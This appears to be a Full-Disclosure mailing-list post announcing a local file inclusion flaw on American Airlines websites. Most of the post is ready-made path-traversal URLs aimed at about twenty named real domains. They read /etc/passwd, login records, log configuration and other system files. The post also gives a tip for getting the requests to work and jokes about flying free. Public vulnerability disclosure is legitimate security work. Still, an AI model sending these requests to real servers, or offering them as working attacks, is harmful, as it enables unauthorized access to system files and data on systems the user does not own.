American Airlines' domains have been vulnerable to Local file Include (I wonder if anyone has flown free using this) http://www.aa.com.do/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.aa.com.pe/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.be/aa/i18nForward.do?locale=en_GB&p=../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.ch/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.cl/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.cn/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.co.cr/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.co.uk/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.de/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.fr/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.ie/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.in/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.it/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.americanairlines.jp/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../etc/passwd http://www.american-airlines.nl/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd https://www.aa.com.ve/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../etc/passwd https://www.americanairlines.com.au/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../etc/passwd https://www.americanairlines.com.ru/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../etc/passwd http://www.flagshiplounge.net/aa/i18nForward.do?locale=en_GB&p= http://www.premiumcustomerservices.net/aa/i18nForward.do?locale=en_GB&p= http://www.touraa.com/aa/i18nForward.do?p= and some senstive files i found https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/wtmpx https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/logadm.conf https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/messages https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../usr/lib/newsyslog https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../usr/sbin/logadm https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/lastlog https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/netconfig https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/syslog.conf https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/system https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/hosts screen shots http://i41.tinypic.com/fcns7t.jpg http://i25.tinypic.com/359z85z.jpg it's been reported and they don't feel like responding (if the page doesn't work try taking off a ../) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/